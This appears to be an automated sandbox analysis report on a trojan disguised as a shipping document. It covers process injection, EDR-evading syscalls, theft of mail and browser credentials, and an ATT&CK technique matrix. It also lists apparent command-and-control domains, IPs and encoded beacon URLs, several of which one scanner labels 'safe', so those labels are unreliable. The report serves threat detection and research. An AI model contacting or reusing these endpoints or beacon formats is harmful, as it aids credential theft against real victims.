                Source: Yara matchFile source: 00000004.00000002.873918569.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369018456.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369105032.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.874128931.0000000004EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A26399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00A26399
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A2685D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Browser Session Hijacking
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS128
                System Information Discovery
                Distributed Component Object Model1
                Email Collection
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets15
                Security Software Discovery
                SSH21
                Input Capture
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNC3
                Clipboard Data
                Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                Remote System Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1550932 Sample: SHIPPING DOC_20241107.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus detection for URL or domain 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 8 other signatures 2->45 9 SHIPPING DOC_20241107.exe 1 2->9         started        process3 signatures4 59 Binary is likely a compiled AutoIt script file 9->59 61 Writes to foreign memory regions 9->61 63 Maps a DLL or memory area into another process 9->63 12 svchost.exe 9->12         started        process5 signatures6 65 Maps a DLL or memory area into another process 12->65 15 AhEyCWkdTLz.exe 12->15 injected process7 signatures8 67 Maps a DLL or memory area into another process 15->67 69 Found direct / indirect Syscall (likely to bypass EDR) 15->69 18 AtBroker.exe 1 20 15->18         started        process9 dnsIp10 31 www.sqlite.org 45.33.6.223, 49162, 80 LINODE-APLinodeLLCUS United States 18->31 29 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 18->29 dropped 47 Tries to steal Mail credentials (via file / registry access) 18->47 49 Tries to harvest and steal browser information (history, passwords, etc) 18->49 51 Maps a DLL or memory area into another process 18->51 53 Queues an APC in another process (thread injection) 18->53 23 AhEyCWkdTLz.exe 18->23 injected 27 firefox.exe 18->27         started        file11 signatures12 process13 dnsIp14 33 www.kghjkx.xyz 23->33 35 www.iuyi542.xyz 23->35 37 25 other IPs or domains 23->37 55 Found direct / indirect Syscall (likely to bypass EDR) 23->55 signatures15 57 Performs DNS queries to domains with low reputation 35->57

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SHIPPING DOC_20241107.exe47%ReversingLabsWin32.Trojan.Autoitinject
                SHIPPING DOC_20241107.exe100%AviraDR/AutoIt.Gen8
                SHIPPING DOC_20241107.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js0%Avira URL Cloudsafe
                http://www.primeproperty.property/c1ti/0%Avira URL Cloudsafe
                http://www.energyparks.net/k47i/?Vta=nFypuDtholF&mFptYb=9kxEYcPO0Qe31MjAFjIcWOncsH25cFhJfOSVnSYcFCRu8P8I16bnvFurvQhgIE0Ki89nSiSy+a0RlMSh3+VYEZE5/A1AoTNj5T9S7+51vpkFoip5Twnd4WVIrXl30%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111653519935.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpg0%Avira URL Cloudsafe
                http://www.flikka.site/brrb/?mFptYb=Pyc5xCH2FNTrUJIJc2J3jfwJvYyqOHlrloocc6vOBweawvT0T5Z/uibAsKRSCDSof6T5ol8OWeU6iNzlygZ3OH11Snb2up2hISFSOV0LFhqb+gPNdrhH/8C3bcPF&Vta=nFypuDtholF0%Avira URL Cloudsafe
                http://www.hasthosting.xyz/04fb/0%Avira URL Cloudsafe
                http://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJycOeh1EqhE8oaarBESMUTzpbIdTTfy1FzFAf98MVDEsTj+MFe4tIzu4mcpDK&Vta=nFypuDtholF0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111718494999.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111602227556.jpg0%Avira URL Cloudsafe
                http://www.ladylawher.shop/i4bc/0%Avira URL Cloudsafe
                http://www.digitaladpro.shop/m6se/?Vta=nFypuDtholF&mFptYb=tpLSjTwEMN9ZKyp9qVSTFKrjCn9ygWFWt49InxX861XvXeuMycl5+MP/OGAzrS8FX3YfTT6PzpVF+4Zez3QIzOzSaqsrWwxbsC4SLAepSA8UeSOwbSX7uDAGPo/m0%Avira URL Cloudsafe
                http://www.energyparks.net/k47i/0%Avira URL Cloudsafe
                http://www.neg21.top/1i1f/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111842165995.jpg0%Avira URL Cloudsafe
                http://www.hasthosting.xyz0%Avira URL Cloudsafe
                http://www.loginov.enterprises/y0sc/?mFptYb=tJdq8Dqw4hWr1P6qEoxHD8OlFm+HKuZ69MCgVLcAx6ZVjDjmpjdFVs/kycs0W1S/0p2sAvBc0lWbLbeb6h4QLTxDUgZUmiCBrM9D9onPOIUOQ3sXksUDVUExaBXH&Vta=nFypuDtholF0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121333505679.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js0%Avira URL Cloudsafe
                http://www.kghjkx.xyz/usop/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                http://www.iuyi542.xyz/cymd/?mFptYb=SQRZB1HP1/e+i1vXkx65XVrDeSNNnXwFTHYuRC8KH5mDKLD+AhmaLKzef3QT7SVce+tzzUZ1GVC2U2YQK5wN3xroRLUyaPMbLSFxR1aJqBACZHGGUwWsqj7Ua713&Vta=nFypuDtholF0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png0%Avira URL Cloudsafe
                http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/yn0%Avira URL Cloudsafe
                https://00808.vip/100%Avira URL Cloudmalware
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121118333732.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281756134546.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpg0%Avira URL Cloudsafe
                http://www.wcp95.top/1bs4/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111554188180.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121337456585.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png0%Avira URL Cloudsafe
                http://www.iuyi542.xyz/cymd/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg0%Avira URL Cloudsafe
                http://www.binacamasala.com/usv6/0%Avira URL Cloudsafe
                http://www.binacamasala.com/usv6/?mFptYb=TgDODAIJaOl5jtT4JVTY+PvwOqFRmlbaFilQ+MjMe2d3S0GP4FMVqMWCvgzOI+CNdjxuqTDbs8bnZHFVmt5Iw+xv7nFgog653DC3dJxayAsmz1wZ3Pvz+hOxoHiw&Vta=nFypuDtholF0%Avira URL Cloudsafe
                http://www.primeproperty.property/c1ti/?Vta=nFypuDtholF&mFptYb=UWVJg+rBkYQ16c/k/Y1W1sgQfFqH6LNVaa0x99kOYGF7jBYWQyWqo55Eiz0L22BflNyMA4mVt2TvQrx7EMMmoG9cjujHDm+244I0l/r76jr6gTXXvUDzyyGCpqIK0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png0%Avira URL Cloudsafe
                http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/yn+NstHLyKrItwi72t2/2aV0X8lTwCWtszw4+D6CyS+H/PrcNES324cNMrQPmMtrZnBxvMQyG2MZhT0iJG1CcvdKppxy///uoLHwLjuGAXtCom68+z&Vta=nFypuDtholF0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg0%Avira URL Cloudsafe
                http://www.jllllbx.top/s7rc/?Vta=nFypuDtholF&mFptYb=6DRnIJ+Fte42OB/5XetGdeOJ+lOhphxOvMg5DpP/yyjJNxXWq01mRUwFVex1iRDtTe4NkeQHEQ9jZsZ13oeWt1010btNzgPMSC+IqSdDnCJo+Vo0XkUS70+rul7v0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121050155085.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111532064388.jpg0%Avira URL Cloudsafe
                http://www.college-help.info/fu91/0%Avira URL Cloudsafe
                http://www.digitaladpro.shop/m6se/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpg0%Avira URL Cloudsafe
                http://www.college-help.info/fu91/?mFptYb=HVzlbrdNsUKwRMyAkWW6+eYcwGansP/WUf8DIHIYxdtxD6ajZVqGQ6r7bYdvsg7HhzGwO4nUubyDeivvZ5uUZnZTjM5UwBrFB6CCixihWT7Na0ffLjed1FEIbDhA&Vta=nFypuDtholF0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css0%Avira URL Cloudsafe
                http://www.wcp95.top/1bs4/?Vta=nFypuDtholF&mFptYb=NHlL/20Wj3mxTDCCV6AphceXnl/MtZ4Wk+fSFhy0eU4XSufIixCpoBi/gorAC+VzK2LBCRkbZWFQo0n9IQJ7RFp7WJwc0YsNtE+R3Mg/2HoitvY+uCvmluoRVqvz0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121427539351.jpg0%Avira URL Cloudsafe
                https://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJ0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121114111017.jpg0%Avira URL Cloudsafe
                http://www.yvrkp.top/9jdk/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png0%Avira URL Cloudsafe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281606448510.jpg0%Avira URL Cloudsafe
                http://www.loginov.enterprises/y0sc/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121352209002.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css0%Avira URL Cloudsafe
                http://www.yvrkp.top/9jdk/?mFptYb=WubzzLgyg7H8FuUk5jz2rAc/vuKAZBsVZD6HlZkF1Lv4/cTJ30fLMnj/fJn75AU89YfOY1B4b6fbf9/30+RUdxRnQcqHHPG8fsTR2djr0+RxMWff6QI0kTzUoO97&Vta=nFypuDtholF0%Avira URL Cloudsafe
                http://www.flikka.site/brrb/0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css0%Avira URL Cloudsafe
                https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                dns.webcake.io
                113.20.119.31
                truefalse
                  high
                  ghs.google.com
                  142.250.185.115
                  truefalse
                    high
                    loginov.enterprises
                    3.33.130.190
                    truetrue
                      unknown
                      wcp95.top
                      154.23.184.95
                      truetrue
                        unknown
                        iuyi542.xyz
                        38.47.237.27
                        truetrue
                          unknown
                          neg21.top
                          206.119.81.36
                          truetrue
                            unknown
                            www.college-help.info
                            38.88.82.56
                            truetrue
                              unknown
                              www.jllllbx.top
                              156.234.28.94
                              truetrue
                                unknown
                                binacamasala.com
                                15.197.148.33
                                truetrue
                                  unknown
                                  ladylawher.shop
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    www.kghjkx.xyz
                                    47.129.103.185
                                    truetrue
                                      unknown
                                      www.yvrkp.top
                                      104.21.14.183
                                      truetrue
                                        unknown
                                        www.flikka.site
                                        67.223.117.142
                                        truetrue
                                          unknown
                                          www.marketplacer.top
                                          194.58.112.174
                                          truetrue
                                            unknown
                                            www.hasthosting.xyz
                                            185.27.134.144
                                            truetrue
                                              unknown
                                              www.sqlite.org
                                              45.33.6.223
                                              truefalse
                                                high
                                                energyparks.net
                                                15.197.148.33
                                                truetrue
                                                  unknown
                                                  www.primeproperty.property
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.digitaladpro.shop
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.energyparks.net
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.neg21.top
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          www.loginov.enterprises
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.binacamasala.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              www.wcp95.top
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                www.iuyi542.xyz
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  www.ladylawher.shop
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    NameMaliciousAntivirus DetectionReputation
                                                                    http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zipfalse
                                                                      high
                                                                      http://www.primeproperty.property/c1ti/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.hasthosting.xyz/04fb/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.flikka.site/brrb/?mFptYb=Pyc5xCH2FNTrUJIJc2J3jfwJvYyqOHlrloocc6vOBweawvT0T5Z/uibAsKRSCDSof6T5ol8OWeU6iNzlygZ3OH11Snb2up2hISFSOV0LFhqb+gPNdrhH/8C3bcPF&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.energyparks.net/k47i/?Vta=nFypuDtholF&mFptYb=9kxEYcPO0Qe31MjAFjIcWOncsH25cFhJfOSVnSYcFCRu8P8I16bnvFurvQhgIE0Ki89nSiSy+a0RlMSh3+VYEZE5/A1AoTNj5T9S7+51vpkFoip5Twnd4WVIrXl3true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJycOeh1EqhE8oaarBESMUTzpbIdTTfy1FzFAf98MVDEsTj+MFe4tIzu4mcpDK&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.digitaladpro.shop/m6se/?Vta=nFypuDtholF&mFptYb=tpLSjTwEMN9ZKyp9qVSTFKrjCn9ygWFWt49InxX861XvXeuMycl5+MP/OGAzrS8FX3YfTT6PzpVF+4Zez3QIzOzSaqsrWwxbsC4SLAepSA8UeSOwbSX7uDAGPo/mfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.energyparks.net/k47i/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.neg21.top/1i1f/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.loginov.enterprises/y0sc/?mFptYb=tJdq8Dqw4hWr1P6qEoxHD8OlFm+HKuZ69MCgVLcAx6ZVjDjmpjdFVs/kycs0W1S/0p2sAvBc0lWbLbeb6h4QLTxDUgZUmiCBrM9D9onPOIUOQ3sXksUDVUExaBXH&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.ladylawher.shop/i4bc/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.kghjkx.xyz/usop/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.iuyi542.xyz/cymd/?mFptYb=SQRZB1HP1/e+i1vXkx65XVrDeSNNnXwFTHYuRC8KH5mDKLD+AhmaLKzef3QT7SVce+tzzUZ1GVC2U2YQK5wN3xroRLUyaPMbLSFxR1aJqBACZHGGUwWsqj7Ua713&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.wcp95.top/1bs4/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.binacamasala.com/usv6/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.iuyi542.xyz/cymd/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.binacamasala.com/usv6/?mFptYb=TgDODAIJaOl5jtT4JVTY+PvwOqFRmlbaFilQ+MjMe2d3S0GP4FMVqMWCvgzOI+CNdjxuqTDbs8bnZHFVmt5Iw+xv7nFgog653DC3dJxayAsmz1wZ3Pvz+hOxoHiw&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.primeproperty.property/c1ti/?Vta=nFypuDtholF&mFptYb=UWVJg+rBkYQ16c/k/Y1W1sgQfFqH6LNVaa0x99kOYGF7jBYWQyWqo55Eiz0L22BflNyMA4mVt2TvQrx7EMMmoG9cjujHDm+244I0l/r76jr6gTXXvUDzyyGCpqIKtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/yn+NstHLyKrItwi72t2/2aV0X8lTwCWtszw4+D6CyS+H/PrcNES324cNMrQPmMtrZnBxvMQyG2MZhT0iJG1CcvdKppxy///uoLHwLjuGAXtCom68+z&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.jllllbx.top/s7rc/?Vta=nFypuDtholF&mFptYb=6DRnIJ+Fte42OB/5XetGdeOJ+lOhphxOvMg5DpP/yyjJNxXWq01mRUwFVex1iRDtTe4NkeQHEQ9jZsZ13oeWt1010btNzgPMSC+IqSdDnCJo+Vo0XkUS70+rul7vtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.digitaladpro.shop/m6se/false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.college-help.info/fu91/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.college-help.info/fu91/?mFptYb=HVzlbrdNsUKwRMyAkWW6+eYcwGansP/WUf8DIHIYxdtxD6ajZVqGQ6r7bYdvsg7HhzGwO4nUubyDeivvZ5uUZnZTjM5UwBrFB6CCixihWT7Na0ffLjed1FEIbDhA&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.wcp95.top/1bs4/?Vta=nFypuDtholF&mFptYb=NHlL/20Wj3mxTDCCV6AphceXnl/MtZ4Wk+fSFhy0eU4XSufIixCpoBi/gorAC+VzK2LBCRkbZWFQo0n9IQJ7RFp7WJwc0YsNtE+R3Mg/2HoitvY+uCvmluoRVqvztrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.yvrkp.top/9jdk/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.loginov.enterprises/y0sc/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.flikka.site/brrb/true
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.yvrkp.top/9jdk/?mFptYb=WubzzLgyg7H8FuUk5jz2rAc/vuKAZBsVZD6HlZkF1Lv4/cTJ30fLMnj/fJn75AU89YfOY1B4b6fbf9/30+RUdxRnQcqHHPG8fsTR2djr0+RxMWff6QI0kTzUoO97&Vta=nFypuDtholFtrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://duckduckgo.com/chrome_newtabAtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                        high
                                                                        https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://duckduckgo.com/ac/?q=AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drfalse
                                                                          high
                                                                          https://reg.ruAtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111718494999.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111653519935.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lanAtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.jsAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111602227556.jpgAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.jsAtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
